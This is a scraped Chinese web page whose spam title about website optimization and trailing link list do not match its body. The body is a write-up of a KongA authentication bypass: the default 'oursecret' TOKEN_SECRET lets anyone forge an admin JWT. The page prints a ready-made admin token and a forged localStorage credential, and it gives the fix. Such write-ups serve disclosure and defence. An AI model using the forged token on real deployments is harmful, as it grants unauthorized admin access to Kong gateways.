当前位置: 首页 > news >正文

河南企业网站优化wordpress爬行记录

河南企业网站优化,wordpress爬行记录,房地产平面设计网站,网站开发个性化KongA 简介 KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga 。 KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置#xff0c;并且可以对于管理 Kong 节点 漏洞成因 未设置TOKEN_SECRE…KongA 简介 KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga 。 KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置并且可以对于管理 Kong 节点 漏洞成因 未设置TOKEN_SECRET导致攻击者可以伪造任意用户的token登录后台。 环境搭建 https://blog.csdn.net/qq_28284093/article/details/109611898 正常功能 login路由输入用户名密码登录 代码在https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/protocols/local.js#L71 验证用户名密码后会生成一个jwt的token。 https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/controllers/AuthController.js#L294 从上图可以看到仅仅将user.id传入issue函数。 https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/Token.js#L23 这里是漏洞的关键如果没有设置TOKEN_SECRET的话默认是oursecret。所以实战情况下漏洞场景还是存在的。 生成token之后将返回的json串存储在localStorage中作为凭证。 代码在 https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/assets/js/app/core/auth/services/AuthService.js#L105 攻击利用 先登录一下看看localStorage。 ngStorage-credentials对应login路由返回包内容 {user:{createdUser:null,updatedUser:1,node:{id:6,name:kong,type:default,kong_admin_url:http://172.30.0.3:8001,netdata_url:null,kong_api_key:,jwt_algorithm:HS256,jwt_key:null,jwt_secret:null,username:,password:,kong_version:2.5.0,health_checks:false,health_check_details:null,active:false,createdAt:2021-07-16T03:26:11.000Z,updatedAt:2021-07-16T03:26:11.000Z,createdUser:1,updatedUser:1},id:1,username:admin,email:adminadmin.com,firstName:null,lastName:null,admin:true,node_id:,active:true,activationToken:7c15366f-2f45-4d2d-93ed-ad57b03e09ba,createdAt:2021-07-16T03:21:14.000Z,updatedAt:2021-07-16T03:26:11.000Z},token:eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo} jwt解密一下看看 朴实无华user.id就是1 。第一个注册用户是1第二个注册用户是2。因为第一个用户往往是管理员用户所以实战情况下构造1的jwt即可。 下面构造任意用户的jwt eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo 构造凭证 {user:{createdUser:null,updatedUser:1,node:{id:1,name:admin,type:default,kong_admin_url:1,netdata_url:null,kong_api_key:,jwt_algorithm:HS256,jwt_key:null,jwt_secret:null,username:,password:,kong_version:2.5.0,health_checks:false,health_check_details:null,active:false,createdAt:1,updatedAt:1,createdUser:1,updatedUser:1},id:1,username:1,email:qqqq.com,firstName:null,lastName:null,admin:true,node_id:,active:true,activationToken:1,createdAt:1,updatedAt:1},token:eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo} 修改localStorage成功进入后台。 漏洞修复 部署时设置TOKEN_SECRET且值为不可爆破的字符串即可。
http://www.dnsts.com.cn/news/242407.html

相关文章:

  • mip网站模板世界互联网峰会视频
  • 青建设厅官方网站网站后台怎么用ftp打开
  • dedecms搭建购物网站wordpress禁用php报错
  • 电影网站带采集酒店手机网站首页设计
  • 企业开办网站凡科建站官网
  • 张家界网站制作仿腾讯游戏网站源码
  • 高端网站建设成都中国建设劳动学会网站
  • 网站网站建站南通做微网站
  • 网站开发开发的前景网站开发具体问题
  • 门户网站建设的重要性网线制作实验步骤
  • 太仓广告设计公司网站图展网站源码
  • asp网站源码 怎么安装最新的国际新闻事件
  • 做游戏动画外包网站涟源seo快速排名
  • 芍药居网站建设公司深圳微信网站开发公司
  • 合肥网站推广优化wordpress登陆错误500
  • 小说网站开发需求wordpress 没有样式表
  • 微信团购群网站怎样做廊坊网站建设-商昊网络
  • 建设银行广西分行网站sem竞价广告
  • 温州个人建站模板7k7k小游戏大全
  • 免费网站能到百度首页吗建立
  • 购彩网站建设seo排名查询软件
  • 网站淘客怎么做百度网站与推广
  • 网站建设推广费会计分录什么是ui设计图
  • 采购网站模板怎样打死网站
  • 做我的狗漫画网站廉政网站建设的意义
  • 自己学习做网站网站留言板块怎么做
  • 高端网站设计制作方法微信网站开发登录
  • 上海品质网站建设运营托管公司
  • 龙岩网站建设画册设计说明
  • 小红书广告投放平台做网站推广用优化还是竞价